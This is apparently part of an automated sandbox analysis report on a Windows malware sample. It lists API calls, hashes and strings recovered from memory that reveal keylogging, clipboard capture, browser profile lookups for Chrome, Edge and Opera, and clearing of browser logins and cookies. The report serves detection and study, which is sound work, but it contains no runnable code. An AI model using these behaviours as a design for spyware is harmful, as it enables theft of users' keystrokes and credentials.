            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
            • GetProcAddress.KERNEL32(00000000), ref: 004014A8
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetLastInputInfo$User32.dll
            • API String ID: 2574300362-1519888992
            • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
            • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
            • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
            • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __alldvrm$_strrchr
            • String ID:
            • API String ID: 1036877536-0
            • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
            • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
            • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
            • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
            • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
            • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
            • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
            APIs
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
            • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
            • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Create$CloseEventHandleObjectSingleThreadWait
            • String ID:
            • API String ID: 3360349984-0
            • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
            • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
            • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
            • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
            APIs
            Strings
            • [Cleared browsers logins and cookies.], xrefs: 0040B025
            • Cleared browsers logins and cookies., xrefs: 0040B036
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
            • API String ID: 3472027048-1236744412
            • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
            • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
            • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
            • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
            APIs
              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
            • Sleep.KERNEL32(00000BB8), ref: 004111DF
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQuerySleepValue
            • String ID: H"G$exepath$!G
            • API String ID: 4119054056-2148977334
            • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
            • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
            • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
            • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
            APIs
              • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
              • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
              • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
            • Sleep.KERNEL32(000001F4), ref: 0040955A
            • Sleep.KERNEL32(00000064), ref: 004095F5
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Window$SleepText$ForegroundLength
            • String ID: [ $ ]
            • API String ID: 3309952895-93608704
            • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
            • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
            • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
            • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
            • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
            • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
            • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
            • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
            • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
            • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
            • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseCreateHandleReadSize
            • String ID:
            • API String ID: 3919263394-0
            • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
            • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
            • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
            • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
              • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
            • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
            • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
            Strings
            • /sort "Visit Time" /stext ", xrefs: 00404092
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
            • String ID: /sort "Visit Time" /stext "
            • API String ID: 368326130-1573945896
            • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
            • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
            • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
            • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
            APIs
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            • __Init_thread_footer.LIBCMT ref: 0040A6E3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Init_thread_footer__onexit
            • String ID: [End of clipboard]$[Text copied to clipboard]
            • API String ID: 1881088180-3686566968
            • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
            • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
            • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
            • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
            APIs
            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: ACP$OCP
            • API String ID: 0-711371036
            • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
            • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
            • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
            • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
            APIs
            • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
            • IsWindowVisible.USER32(?), ref: 00415B37
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Window$TextVisible
            • String ID: (%G
            • API String ID: 1670992164-3377777310
            • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
            • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
            • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
            • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
            APIs
            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
            Strings
            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime
            • String ID: Connection KeepAlive | Enabled | Timeout:
            • API String ID: 481472006-507513762
            • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
            • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
            • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
            • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
            • ___raise_securityfailure.LIBCMT ref: 00432E76
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor___raise_securityfailure
            • String ID: (F
            • API String ID: 3761405300-3109638091
            • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
            • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
            • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
            • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
            APIs
            • GetLocalTime.KERNEL32(00000000), ref: 004194F4
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime
            • String ID: | $%02i:%02i:%02i:%03i
            • API String ID: 481472006-2430845779
            • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
            • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
            • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
            • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
            APIs
            • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: alarm.wav$x(G
            • API String ID: 1174141254-2413638199
            • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
            • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
            • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
            • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
            APIs
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • CloseHandle.KERNEL32(?), ref: 00409FFD
            • UnhookWindowsHookEx.USER32 ref: 0040A010
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
            • String ID: Online Keylogger Stopped
            • API String ID: 1623830855-1496645233
            • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
            • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
            • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
            • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
            • API String ID: 1174141254-2800177040
            • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
            • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
            • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
            • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: UserProfile$\AppData\Local\Google\Chrome\
            • API String ID: 1174141254-4188645398
            • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
            • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
            • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
            • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
            APIs
            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExistsFilePath
            • String ID: AppData$\Opera Software\Opera Stable\
            • API String ID: 1174141254-1629609700
            • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
            • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
            • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
            • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
            APIs
            • GetKeyState.USER32(00000011), ref: 0040A597
              • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
              • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
              • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
              • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
              • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
              • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
            • String ID: [AltL]$[AltR]
            APIs
            • GetKeyState.USER32(00000012), ref: 0040A5F1
            • API ID: State
            • String ID: [CtrlL]$[CtrlR]
            APIs
            • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
            • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
            • API ID: DeleteOpenValue
            • String ID: 6h@
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
            • GetLastError.KERNEL32 ref: 0043B4E9
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
            • API ID: ByteCharMultiWide$ErrorLast
            APIs
            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00410955), ref: 004105F1
            • IsBadReadPtr.KERNEL32(?,00000014,00410955), ref: 004106BD
            • SetLastError.KERNEL32(0000007F), ref: 004106DF
            • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
            • API ID: ErrorLastRead